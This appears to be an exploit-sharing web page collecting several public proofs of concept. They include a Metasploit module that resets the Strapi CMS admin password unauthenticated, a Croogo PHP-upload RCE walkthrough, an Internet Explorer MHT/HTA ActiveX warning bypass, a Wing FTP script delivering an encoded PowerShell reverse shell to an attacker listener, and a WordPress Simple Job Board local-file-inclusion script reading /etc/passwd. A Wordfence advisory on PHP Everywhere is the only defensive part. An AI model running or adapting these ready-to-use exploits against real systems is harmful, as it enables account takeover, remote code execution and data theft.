Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)", 'Description' => %q{ This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user. }, 'License' => MSF_LICENSE, 'Author' => [ 'WackyH4cker' ], 'References' => [ [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Strapi 3.0.0-beta-17.4', {} ] ], 'Payload' => '', 'Privileged' => true, 'DisclosureDate' => "", 'DefaultOptions' => { 'SSL' => 'False', 'RPORT' => 80, }, 'DefaultTarget' => 0 )) register_options [ OptString.new('NEW_PASSWORD', [true, 'New password for user Admin']) ] end def check res = send_request_raw({ 'uri' => '/admin/init' }) version = JSON.parse(res.body) if version["data"]["strapiVersion"] == '3.0.0-beta.17.4' return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def run json_body = { 'code' => {'$gt' => 0}, 'password' => datastore['NEW_PASSWORD'], 'passwordConfirmation' => datastore['NEW_PASSWORD'] } res = send_request_cgi({ 'method' => 'POST', 'uri' => '/admin/auth/reset-password', 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) print_status("Changing password...") json_format = JSON.parse(res.body) jwt = json_format['jwt'] if res.code == 200 print_good("Password changed successfully!") print_good("USER: admin") print_good("PASSWORD: #{datastore['NEW_PASSWORD']}") print_good("JWT: #{jwt}") else fail_with(Failure::NoAccess"Could not change admin user password") end end end </code></pre>

<pre><code># Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated) # Date: 05/12/2021 # Exploit Author: Deha Berkin Bir # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> Tutorial <== 1- Login with your privileged account. 2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'. 3- Click the 'New Attachment' button. 4- Choose a malicious php script and upload it. ########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT #################### <?php $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ############################################################################ 5- Click on the URL of malicious php script you uploaded. 6- The malicious PHP script will be executed. ==> HTTP Request (File Upload) <== POST /admin/file-manager/attachments/add HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694 Content-Length: 976 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/add Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------7028631106888453201670373694 Content-Disposition: form-data; name="_method" POST -----------------------------7028631106888453201670373694 Content-Disposition: form-data; name="_csrfToken" bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb -----------------------------7028631106888453201670373694 Content-Disposition: form-data; name="file"; filename="malicious.php" Content-Type: application/octet-stream <?php $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> -----------------------------7028631106888453201670373694 Content-Disposition: form-data; name="_Token[fields]" 16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A -----------------------------7028631106888453201670373694 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------7028631106888453201670373694-- </code></pre>

<pre><code>On January 4, 2022, the Wordfence Threat Intelligence team began the responsible disclosure process for several Remote Code Execution vulnerabilities in PHP Everywhere, a WordPress plugin installed on over 30,000 websites. One of these vulnerabilities allowed any authenticated user of any level, even subscribers and customers, to execute code on a site with the plugin installed. As the vulnerabilities were of critical severity, we contacted the WordPress plugin repository with our disclosure in addition to initiating outreach to the plugin author. We received a response from the plugin author within a few hours and sent over the full disclosure at that time. A largely rebuilt version of the plugin was made available on January 10, 2022. What should I do if I’m running PHP Everywhere? If you’re using the PHP everywhere plugin, it is imperative that you upgrade to the newest version, which is 3.0.0 at the time of this writing, in order to prevent your site from being exploited. Unfortunately, version 3.0.0 only supports PHP snippets via the Block editor, so if you are using the Classic Editor you will need to uninstall the plugin and find another solution. You should not continue to run older versions of PHP Everywhere under any circumstances. Description: Remote Code Execution by Subscriber+ users via shortcode Affected Plugin: PHP Everywhere Plugin Slug: php-everywhere Plugin Developer: Alexander Fuchs Affected Versions: <= 2.0.3 CVE ID: CVE-2022-24663 CVSS Score: 9.9(Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Researcher/s: Ramuel Gall Fully Patched Version: 3.0.0 PHP Everywhere is a WordPress plugin that is intended to allow site owners to execute PHP code anywhere on their site. It included functionality that allowed execution of PHP Code Snippets via WordPress shortcodes. Unfortunately, WordPress allows any authenticated users to execute shortcodes via the parse-media-shortcode AJAX action, and some plugins also allow unauthenticated shortcode execution. As such it was possible for any logged-in user, even a user with almost no permissions, such as a Subscriber or a Customer, to execute arbitrary PHP on a site by sending a request with the shortcode parameter set to [php_everywhere]<arbitrary PHP>[/php_everywhere]. Executing arbitrary PHP on a site typically allows complete site takeover. Description: Remote Code Execution by Contributor+ users via metabox Affected Plugin: PHP Everywhere Plugin Slug: php-everywhere Plugin Developer: Alexander Fuchs Affected Versions: <= 2.0.3 CVE ID: CVE-2022-24664 CVSS Score: 9.9(Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Researcher/s: Ramuel Gall Fully Patched Version: 3.0.0 By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere metabox. Unfortunately this meant that untrusted Contributor-level users could use the PHP Everywhere metabox to achieve code execution on a site by creating a post, adding PHP code to the PHP Everywhere metabox, and then previewing the post. While this vulnerability has the same CVSS score as the shortcode vulnerability, it is less severe, since it requires contributor-level permissions, which imply some degree of trust and are more difficult to obtain than subscriber-level permissions. This is due to the CVSS scoring system which does not allow “Medium” in the “Privileges Required” field. Description: Remote Code Execution by Contributor+ users via gutenberg block Affected Plugin: PHP Everywhere Plugin Slug: php-everywhere Plugin Developer: Alexander Fuchs Affected Versions: <= 2.0.3 CVE ID: CVE-2022-24665 CVSS Score: 9.9(Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Researcher/s: Ramuel Gall Fully Patched Version: 3.0.0 By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere Gutenberg block. While it was possible to set this to admin-only, this was not set by default due to versions <= 2.0.3 not being able to add capability checks without disabling the Gutenberg Block editor. We worked with the plugin author to overcome this limitation when we sent our disclosure. Unfortunately this meant that contributor-level users could execute arbitrary PHP code on a site by creating a post, adding the PHP everywhere block and adding code to it, and then previewing the post. As with the metabox vulnerability, this has the same CVSS score as the shortcode vulnerability but is less severe as it requires Contributor-level permissions to exploit. Timeline January 4, 2022 – We release a firewall rule available to Wordfence Premium, Wordfence Care, and Wordfence Response customers. We begin the disclosure process with the plugin author and disclose to the WordPress plugin repository. The plugin author responds and we send over full disclosure. January 10, 2022 – A Patched version, 3.0.0, is released. February 3, 2022 – The firewall rule becomes available to free Wordfence users. Conclusion In today’s article, we discussed a set of vulnerabilities in the PHP Everywhere plugin which could be used for complete site takeover. If you know anyone running this plugin we strongly advise forwarding this advisory to them, as these vulnerabilities are very easy to exploit and can be used to quickly and completely take over a site. </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer (MSIE) Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] ActiveX Control Security Bypass [CVE Reference] N/A [Security Issue] Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites. By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar. However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g. "Content-Location: PBARBAR" Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS. Tested successfully on Windows 10 latest fully patched version with default IE security settings. Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows. Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement. [PoC Requirements] MHT file must reside on disk, think targeted attack scenarios. [Exploit/POC] Change [VICTIM] value below to a specified user for testing. 1) Create the MHT PoC file. "MSIE_ActiveX_Control_Security_Bypass.mht" From: Subject: Date: MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001" This is a multi-part message in MIME format. --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001 Content-Type: text/html; charset="UTF-8" Content-Location: DOOM <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <script> win=window win.open("http://www.microsoft.com","","width=600,height=600") var args = ['height='+1,'width='+1,].join(',') setTimeout("", 3000) var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args) pop.moveTo(2000,2000) </script> </body> </html> --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001-- 2) Create the PoC HTA file. "Sales_Report_2021.csv ________________________________________________________.hta" <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script language="VBScript"> Set WshShell = CreateObject("WScript.Shell") WshShell.Run("calc.exe") </script> 3) Open the MHT file locally. [Network Access] Local [POC/Video URL] https://www.youtube.com/watch?v=UCSqFbYUvBk [Disclosure Timeline] Vendor Notification: May 13, 2019 MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." December 5, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>

<pre><code># Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated) # Date: 02/06/2022 # Exploit Author: notcos # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes. # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download/WingFtpServer.exe # Version: <=4.3.8 # Tested on: Windows # !/usr/bin/python3 import requests import sys import base64 import urllib.parse # Get command line arguments if len(sys.argv) != 7: print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.") print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0]) print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0]) exit(1) else: target = sys.argv[1] targetport = sys.argv[2] localip = sys.argv[3] localport = sys.argv[4] user = sys.argv[5] password = sys.argv[6] print(''' .--. / ,~a`-, \ \_.-"` ) ( __ __ .__ ____ __________ _________ ___________ ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/ / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_ / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\ / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ / ,/_."` /` \/ \/ \/ \/ \/ /_/\ |___ `~~~~~` ''') # Create the login request url = 'http://' + target + ':' + targetport + '/admin_loginok.html' data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su' 'bmit_btn=%2bLogin%2b') headers = { "User-Agent": "Googlebot" } # Send the POST request to log in and save the cookie r = requests.post(url, headers=headers, data=data) cookie = 'UIDADMIN=' + r.cookies['UIDADMIN'] print('Login successful - Cookie: ' + cookie) url = "http://172.31.1.20:8080/admin_lua_script.html" headers = { "User-Agent": "Googlebot", "Cookie": cookie, } # Base64 encode a nishang reverse tcp shell one liner and then url encode it nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client" ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d" "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1" " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI" "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()") encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8") urlpayload = urllib.parse.quote(encodedStr, safe='+') finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')" # Send the reverse shell payload try: r = requests.post(url, headers=headers, data=finalload, timeout=0.1) except requests.exceptions.ReadTimeout: print("The payload has been sent. Check your listener.") pass </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion # Date: 2022-02-06 # Exploit Author: Ven3xy # Vendor Homepage: https://wordpress.org/plugins/simple-job-board/ # Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip # Version: 2.9.3 # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2020-35749 import requests import sys import time class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ 888 888 \n''' run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 5): banner() print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>") print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin") exit() else: banner() fetch_path = sys.argv[2] print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path) time.sleep(3) target_url = sys.argv[1] usernamex = sys.argv[3] passwordx = sys.argv[4] print("\n") login = target_url+"wp-login.php" wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path username = usernamex password = passwordx with requests.Session() as s: headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' } post_data={ 'log':username, 'pwd':password, 'wp-submit':'Log In','redirect_to':wp_path, 'testcookie':'1' } s.post(login, headers=headers, data=post_data) resp = s.get(wp_path) out_file = open("output.txt", "w") print(resp.text, file=out_file) out_file.close() print(color_random[4]+resp.text) out = color_random[5]+"\n[+] Output Saved as: output.txt\n" print(out) </code></pre>